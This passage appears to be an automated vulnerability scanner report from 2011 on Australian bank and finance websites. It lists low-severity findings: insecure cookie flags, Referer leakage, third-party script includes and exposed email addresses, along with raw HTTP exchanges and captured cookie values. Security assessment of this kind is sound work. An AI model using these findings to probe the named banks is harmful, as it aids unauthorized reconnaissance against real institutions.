7.23. https://www.macquarie.com.au/mgl/au/personal/search-results previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.macquarie.com.au
Path:	/mgl/au/personal/search-results

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

TS529c02=6d3121c4af65fef40e668ee7fb3732cf36824e21333054354e81ded2a3a2c207ffffffff60ac0ec51f6c9215e902011a5072448faac4ce84002f3168; Max-Age=900; Path=/
TS56ffcb=b777a5470c0eba2c6e756b9bf452eafd36824e21333054354e81db99a3a2c207ffffffff60ac0ec5fff100f8; Max-Age=900; Path=/mgl/au/personal

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

7.24. https://www.macquarie.com.au/mgl/au/personal/superannuation/self-managed/equity-lever previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.macquarie.com.au
Path:	/mgl/au/personal/superannuation/self-managed/equity-lever

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TS529c02=4d7196d087ea27197b0e1154f5504630d7910ed46fa150cd4e81de4eaac4ce84002f3168a3a2c207ffffffff60ac0ec52a841a0f; Max-Age=900; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

7.25. https://www.macquarie.com.au/mgl/au/personal/trading/international-money-transfers/international-money-transfers previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.macquarie.com.au
Path:	/mgl/au/personal/trading/international-money-transfers/international-money-transfers

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TS529c02=4d7196d087ea27197b0e1154f5504630d7910ed46fa150cd4e81de4eaac4ce84002f3168a3a2c207ffffffff60ac0ec52a841a0f; Max-Age=900; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

8. Cross-domain Referer leakage previous next
There are 5 instances of this issue:

http://calculator-config.infochoice.com.au/GetConfiguration.ashx
http://www.bendigobank.com.au/public/business/business_finance_loan_dbdetail.asp
http://www.commbank.com.au/error/error.aspx
https://www.macquarie.com.au/mgl/au/personal/error404.htm
https://www.macquarie.com.au/mgl/au/personal/search-results

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

8.1. http://calculator-config.infochoice.com.au/GetConfiguration.ashx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://calculator-config.infochoice.com.au
Path:	/GetConfiguration.ashx

Issue detail

The page was loaded from a URL containing a query string:

http://calculator-config.infochoice.com.au/GetConfiguration.ashx?client=4fc422d4-0c52-427e-981e-0798a156a823&calculator=b68a8185-8f20-4433-8af1-d79620e977c8

The response contains the following links to other domains:

http://www.ato.gov.au/individuals/content.aspx?menuid=0&doc=/content/00216565.htm&page=3
http://www.ato.gov.au/individuals/pathway.aspx?pc=001/002/030

Request

GET /GetConfiguration.ashx?client=4fc422d4-0c52-427e-981e-0798a156a823&calculator=b68a8185-8f20-4433-8af1-d79620e977c8 HTTP/1.1
Host: calculator-config.infochoice.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.infochoice.com.au/distributions/flash2010/prod/suite/LoanComparison.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 27 Sep 2011 15:02:43 GMT
Content-Length: 13122

<calculator>
<styleVariables>
<black value="0x000001" />
<white value="0xFFFFFF" />
<grey value="0xCCCCCC" />
<red value="0xFF0000" />
<green value="0x00FF00" />
<blue
...[SNIP]...
<p>Rates and thresholds correct for 2009-10. For more information visit the <a href="http://www.ato.gov.au/individuals/pathway.aspx?pc=001/002/030"><font color="#0000FF">
...[SNIP]...
<br>Rates and thresholds correct for 2009-10. For more information visit the <a href="http://www.ato.gov.au/individuals/pathway.aspx?pc=001/002/030"><font color="#0000FF">
...[SNIP]...
<br>Refer to the <a href="http://www.ato.gov.au/individuals/content.aspx?menuid=0&doc=/content/00216565.htm&page=3#P15_1274"><font color="#0000FF">
...[SNIP]...

8.2. http://www.bendigobank.com.au/public/business/business_finance_loan_dbdetail.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bendigobank.com.au
Path:	/public/business/business_finance_loan_dbdetail.asp

Issue detail

The page was loaded from a URL containing a query string:

http://www.bendigobank.com.au/public/business/business_finance_loan_dbdetail.asp?ID=4

The response contains the following link to another domain:

http://www.bendigoadelaide.com.au/shareholders/annual_reports.asp

Request

GET /public/business/business_finance_loan_dbdetail.asp?ID=4 HTTP/1.1
Host: www.bendigobank.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.bendigobank.com.au/public/Business/index.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AMWEBJCT!%2Fpublic!ASPSESSIONIDCCRBCSSB=JMEBDKNAGOFMJCJNKHCNPOCJ; PD_STATEFUL_747f98c0-f7c5-11df-9241-000d609a5f62=%2Fpublic; __utma=54411067.1394758349.1317133241.1317133241.1317133241.1; __utmb=54411067.3.10.1317133241; __utmc=54411067; __utmz=54411067.1317133241.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
p3p: CP="NON CUR OTPi OUR NOR UNI"
content-type: text/html
date: Tue, 27 Sep 2011 14:22:18 GMT
x-powered-by: ASP.NET
cache-control: private
Content-Length: 22817

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/Templates/Level-04.dwt.asp" codeOutsideHTMLIsLocked="false
...[SNIP]...
<br />
<a href="http://www.bendigoadelaide.com.au/shareholders/annual_reports.asp" target="_blank">Annual Report</a>
...[SNIP]...

8.3. http://www.commbank.com.au/error/error.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.commbank.com.au
Path:	/error/error.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://www.commbank.com.au/error/error.aspx?aspxerrorpath=/search/searchresults.aspx

The response contains the following links to other domains:

https://www.comsec.com.au/
https://www.comsec.com.au/default.aspx

Request

GET /error/error.aspx?aspxerrorpath=/search/searchresults.aspx HTTP/1.1
Host: www.commbank.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.commbank.com.au/business/international/importers/default.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: commbankhttpnew=YVPWQQScommbank-n81CKWJQ; s_cmgkw=%5B%5B%27ns%257Caustralia%2520bank%27%2C%271317133223146%27%5D%5D; c_m=australia%20bankGooglewww.google.com; __utma=176409783.1366260428.1317133221.1317133221.1317133221.1; __utmb=176409783.3.10.1317133221; __utmc=176409783; __utmz=176409783.1317133221.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=australia%20bank; s_cc=true; gpv_p6=no%20value; s_nr=1317134147714; s_sq=cba-prod%3D%2526pid%253Dcba%25253Abus%25253Ainternational%25253Aimporters%25253Adefault.aspx%2526pidt%253D1%2526oid%253Dhttp%25253A//www.commbank.com.au/images/global/search-right-icon.gif%2526ot%253DIMAGE

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Length: 13840
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 27 Sep 2011 14:35:05 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Commonwealth Ba
...[SNIP]...
<td id="TDcommsec"><a target="_blank" href="https://www.comsec.com.au/default.aspx"><img src="/images/global/login_commsec.jpg" width="75" height="24" alt="Log on to CommSec" />
...[SNIP]...
<br />
<a href="https://www.comsec.com.au/default.aspx" class="loginUserLink"><img src="/images/global/information_link.gif" width="70" height="12" alt="CommSec Information" />
...[SNIP]...
<td class="logonButtonCell"><a target="_blank" href="https://www.comsec.com.au/default.aspx" onclick="var s=s_gi(s_account); s.linkTrackVars='events';s.linkTrackEvents='event2';s.events='event2'; s.tl(this,'o','CommSec login button');" id="commsecLogon" tabindex="5"><img src="/images/global/button_logon.gif" width="66" height="23" alt="Log on to CommSec" />
...[SNIP]...
<img src="/images/global/navArrowOrange.gif" width="5" height="8" alt="navigation arrow" /> <a href="https://www.comsec.com.au/default.aspx" tabindex="6">CommSec Information</a>
...[SNIP]...
<img hspace="5" vspace="2" align="absmiddle" src="/images/css/navArrowOrange.gif" /><a href="https://www.comsec.com.au/">CommSec</a>
...[SNIP]...

8.4. https://www.macquarie.com.au/mgl/au/personal/error404.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.macquarie.com.au
Path:	/mgl/au/personal/error404.htm

Issue detail

The page was loaded from a URL containing a query string:

https://www.macquarie.com.au/mgl/au/personal/error404.htm?conversationId=351802

The response contains the following link to another domain:

https://www.google.com/recaptcha/api/js/recaptcha_ajax.js

Request

Response

8.5. https://www.macquarie.com.au/mgl/au/personal/search-results previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.macquarie.com.au
Path:	/mgl/au/personal/search-results

Issue detail

The page was loaded from a URL containing a query string:

https://www.macquarie.com.au/mgl/au/personal/search-results?portal=personal&query=xss+interest+bond+mortgage&x=10&y=6

The response contains the following link to another domain:

https://www.google.com/recaptcha/api/js/recaptcha_ajax.js

Request

Response

9. Cross-domain script include previous next
There are 18 instances of this issue:

http://www.commbank.com.au/
http://www.commbank.com.au/business/international/
http://www.commbank.com.au/business/international/importers/default.aspx
http://www.commbank.com.au/locate-us/
http://www.commbank.com.au/news/news-skimming.aspx
https://www.macquarie.com.au/mgl/au/personal/
https://www.macquarie.com.au/mgl/au/personal/credit-cards
https://www.macquarie.com.au/mgl/au/personal/error404.htm
https://www.macquarie.com.au/mgl/au/personal/financial-advice/stockbroking
https://www.macquarie.com.au/mgl/au/personal/financial-advice/stockbroking/futures
https://www.macquarie.com.au/mgl/au/personal/financial-advice/strategic-wealth-management
https://www.macquarie.com.au/mgl/au/personal/insurance/life-insurance/macquarie-life-active
https://www.macquarie.com.au/mgl/au/personal/loans/home-loans
https://www.macquarie.com.au/mgl/au/personal/savings-accounts/high-interest-savings-accounts
https://www.macquarie.com.au/mgl/au/personal/savings-accounts/term-deposits/term-deposits
https://www.macquarie.com.au/mgl/au/personal/search-results
https://www.macquarie.com.au/mgl/au/personal/superannuation/self-managed/equity-lever
https://www.macquarie.com.au/mgl/au/personal/trading/international-money-transfers/international-money-transfers

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

9.1. http://www.commbank.com.au/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.commbank.com.au
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://www.google.com/jsapi

Request

GET / HTTP/1.1
Host: www.commbank.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.google.com/search?aq=f&gcx=c&sourceid=chrome&ie=UTF-8&q=australia+bank
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 28700
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 27 Sep 2011 14:19:34 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...

<script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

9.2. http://www.commbank.com.au/business/international/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.commbank.com.au
Path:	/business/international/

Issue detail

The response dynamically includes the following script from another domain:

http://www.google.com/jsapi

Request

GET /business/international/ HTTP/1.1
Host: www.commbank.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.commbank.com.au/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: commbankhttpnew=YVPWQQScommbank-n81CKWJQ; __utma=176409783.1366260428.1317133221.1317133221.1317133221.1; __utmb=176409783.1.10.1317133221; __utmc=176409783; __utmz=176409783.1317133221.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=australia%20bank; s_cc=true; s_cmgkw=%5B%5B%27ns%257Caustralia%2520bank%27%2C%271317133223146%27%5D%5D; c_m=australia%20bankGooglewww.google.com; gpv_p6=no%20value; s_nr=1317133267984; s_sq=cba-prod%3D%2526pid%253Dcba%25253Adefault.aspx%2526pidt%253D1%2526oid%253Dhttp%25253A//www.commbank.com.au/business/international%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 25247
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 27 Sep 2011 14:21:15 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...

<script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

9.3. http://www.commbank.com.au/business/international/importers/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.commbank.com.au
Path:	/business/international/importers/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://www.google.com/jsapi

Request

GET /business/international/importers/default.aspx HTTP/1.1
Host: www.commbank.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.commbank.com.au/business/international/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: commbankhttpnew=YVPWQQScommbank-n81CKWJQ; s_cmgkw=%5B%5B%27ns%257Caustralia%2520bank%27%2C%271317133223146%27%5D%5D; c_m=australia%20bankGooglewww.google.com; __utma=176409783.1366260428.1317133221.1317133221.1317133221.1; __utmb=176409783.2.10.1317133221; __utmc=176409783; __utmz=176409783.1317133221.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=australia%20bank; s_cc=true; gpv_p6=no%20value; s_nr=1317134134906; s_sq=cba-prod%3D%2526pid%253Dcba%25253Abus%25253Ainternational%25253Adefault.aspx%2526pidt%253D1%2526oid%253Dhttp%25253A//www.commbank.com.au/business/international/importers/default.aspx%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 25602
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 27 Sep 2011 14:34:52 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...

<script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

9.4. http://www.commbank.com.au/locate-us/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.commbank.com.au
Path:	/locate-us/

Issue detail

The response dynamically includes the following script from another domain:

http://maps.google.com/maps/api/js?sensor=false&region=AU

Request

GET /locate-us/ HTTP/1.1
Host: www.commbank.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 118386
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 27 Sep 2011 14:31:46 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_Head1">
...[SNIP]...
<link rel="stylesheet" type="text/css" href="App_Themes/print.css" media="print" />

<script type="text/javascript" src="http://maps.google.com/maps/api/js?sensor=false&region=AU"></script>
...[SNIP]...

9.5. http://www.commbank.com.au/news/news-skimming.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.commbank.com.au
Path:	/news/news-skimming.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://www.google.com/jsapi

Request

GET /news/news-skimming.aspx HTTP/1.1
Host: www.commbank.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 17529
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 27 Sep 2011 14:31:48 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...

<script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

9.6. https://www.macquarie.com.au/mgl/au/personal/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.macquarie.com.au
Path:	/mgl/au/personal/

Issue detail

The response dynamically includes the following script from another domain:

https://www.google.com/recaptcha/api/js/recaptcha_ajax.js

Request

Response

9.7. https://www.macquarie.com.au/mgl/au/personal/credit-cards previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.macquarie.com.au
Path:	/mgl/au/personal/credit-cards

Issue detail

The response dynamically includes the following script from another domain:

https://www.google.com/recaptcha/api/js/recaptcha_ajax.js

Request

GET /mgl/au/personal/credit-cards HTTP/1.1
Host: www.macquarie.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

9.8. https://www.macquarie.com.au/mgl/au/personal/error404.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.macquarie.com.au
Path:	/mgl/au/personal/error404.htm

Issue detail

The response dynamically includes the following script from another domain:

https://www.google.com/recaptcha/api/js/recaptcha_ajax.js

Request

Response

9.9. https://www.macquarie.com.au/mgl/au/personal/financial-advice/stockbroking previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.macquarie.com.au
Path:	/mgl/au/personal/financial-advice/stockbroking

Issue detail

The response dynamically includes the following script from another domain:

https://www.google.com/recaptcha/api/js/recaptcha_ajax.js

Request

Response

9.10. https://www.macquarie.com.au/mgl/au/personal/financial-advice/stockbroking/futures previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.macquarie.com.au
Path:	/mgl/au/personal/financial-advice/stockbroking/futures

Issue detail

The response dynamically includes the following script from another domain:

https://www.google.com/recaptcha/api/js/recaptcha_ajax.js

Request

Response

9.11. https://www.macquarie.com.au/mgl/au/personal/financial-advice/strategic-wealth-management previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.macquarie.com.au
Path:	/mgl/au/personal/financial-advice/strategic-wealth-management

Issue detail

The response dynamically includes the following script from another domain:

https://www.google.com/recaptcha/api/js/recaptcha_ajax.js

Request

Response

9.12. https://www.macquarie.com.au/mgl/au/personal/insurance/life-insurance/macquarie-life-active previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.macquarie.com.au
Path:	/mgl/au/personal/insurance/life-insurance/macquarie-life-active

Issue detail

The response dynamically includes the following script from another domain:

https://www.google.com/recaptcha/api/js/recaptcha_ajax.js

Request

Response

9.13. https://www.macquarie.com.au/mgl/au/personal/loans/home-loans previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.macquarie.com.au
Path:	/mgl/au/personal/loans/home-loans

Issue detail

The response dynamically includes the following scripts from other domains:

https://www.everestjs.net/static/st.js
https://www.google.com/recaptcha/api/js/recaptcha_ajax.js

Request

GET /mgl/au/personal/loans/home-loans HTTP/1.1
Host: www.macquarie.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

9.14. https://www.macquarie.com.au/mgl/au/personal/savings-accounts/high-interest-savings-accounts previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.macquarie.com.au
Path:	/mgl/au/personal/savings-accounts/high-interest-savings-accounts

Issue detail

The response dynamically includes the following script from another domain:

https://www.google.com/recaptcha/api/js/recaptcha_ajax.js

Request

Response

9.15. https://www.macquarie.com.au/mgl/au/personal/savings-accounts/term-deposits/term-deposits previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.macquarie.com.au
Path:	/mgl/au/personal/savings-accounts/term-deposits/term-deposits

Issue detail

The response dynamically includes the following script from another domain:

https://www.google.com/recaptcha/api/js/recaptcha_ajax.js

Request

Response

9.16. https://www.macquarie.com.au/mgl/au/personal/search-results previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.macquarie.com.au
Path:	/mgl/au/personal/search-results

Issue detail

The response dynamically includes the following script from another domain:

https://www.google.com/recaptcha/api/js/recaptcha_ajax.js

Request

Response

9.17. https://www.macquarie.com.au/mgl/au/personal/superannuation/self-managed/equity-lever previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.macquarie.com.au
Path:	/mgl/au/personal/superannuation/self-managed/equity-lever

Issue detail

The response dynamically includes the following script from another domain:

https://www.google.com/recaptcha/api/js/recaptcha_ajax.js

Request

Response

9.18. https://www.macquarie.com.au/mgl/au/personal/trading/international-money-transfers/international-money-transfers previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.macquarie.com.au
Path:	/mgl/au/personal/trading/international-money-transfers/international-money-transfers

Issue detail

The response dynamically includes the following script from another domain:

https://www.google.com/recaptcha/api/js/recaptcha_ajax.js

Request

Response

10. Email addresses disclosed previous next
There are 19 instances of this issue:

http://calculator-config.infochoice.com.au/GetConfiguration.ashx
http://www.bendigobank.com.au/public/business/insurance_dbdetail.asp
http://www.commbank.com.au/js/mootools-1.2.4.4-more.js
http://www.commbank.com.au/locate-us/
https://www.macquarie.com.au/mgl/au/personal/
https://www.macquarie.com.au/mgl/au/personal/campaigns/superannuation/smsf
https://www.macquarie.com.au/mgl/au/personal/credit-cards
https://www.macquarie.com.au/mgl/au/personal/error404.htm
https://www.macquarie.com.au/mgl/au/personal/financial-advice/stockbroking
https://www.macquarie.com.au/mgl/au/personal/financial-advice/stockbroking/futures
https://www.macquarie.com.au/mgl/au/personal/financial-advice/strategic-wealth-management
https://www.macquarie.com.au/mgl/au/personal/insurance/life-insurance/macquarie-life-active
https://www.macquarie.com.au/mgl/au/personal/js/core/mac-libraries.js
https://www.macquarie.com.au/mgl/au/personal/loans/home-loans
https://www.macquarie.com.au/mgl/au/personal/savings-accounts/high-interest-savings-accounts
https://www.macquarie.com.au/mgl/au/personal/savings-accounts/term-deposits/term-deposits
https://www.macquarie.com.au/mgl/au/personal/search-results
https://www.macquarie.com.au/mgl/au/personal/superannuation/self-managed/equity-lever
https://www.macquarie.com.au/mgl/au/personal/trading/international-money-transfers/international-money-transfers

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

10.1. http://calculator-config.infochoice.com.au/GetConfiguration.ashx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://calculator-config.infochoice.com.au
Path:	/GetConfiguration.ashx

Issue detail

The following email address was disclosed in the response:

calculator-support@infochoice.com.au

Request

Response

10.2. http://www.bendigobank.com.au/public/business/insurance_dbdetail.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bendigobank.com.au
Path:	/public/business/insurance_dbdetail.asp

Issue detail

The following email address was disclosed in the response:

insurance@bendigobank.com.au

Request

GET /public/business/insurance_dbdetail.asp HTTP/1.1
Host: www.bendigobank.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
p3p: CP="NON CUR OTPi OUR NOR UNI"
content-type: text/html
date: Tue, 27 Sep 2011 14:32:32 GMT
x-powered-by: ASP.NET
connection: close
cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/Templates/Level-04.dwt.asp" codeOutsideHTMLIsLocked="false
...[SNIP]...
<a href="mailto:insurance@bendigobank.com.au">insurance@bendigobank.com.au</a>
...[SNIP]...

10.3. http://www.commbank.com.au/js/mootools-1.2.4.4-more.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.commbank.com.au
Path:	/js/mootools-1.2.4.4-more.js

Issue detail

The following email address was disclosed in the response:

fred@domain.com

Request

GET /js/mootools-1.2.4.4-more.js HTTP/1.1
Host: www.commbank.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.commbank.com.au/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: commbankhttpnew=YVPWQQScommbank-n81CKWJQ

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Sun, 19 Sep 2010 15:08:45 GMT
Accept-Ranges: bytes
ETag: "5c40358ec58cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 27 Sep 2011 14:19:34 GMT
Content-Length: 134297

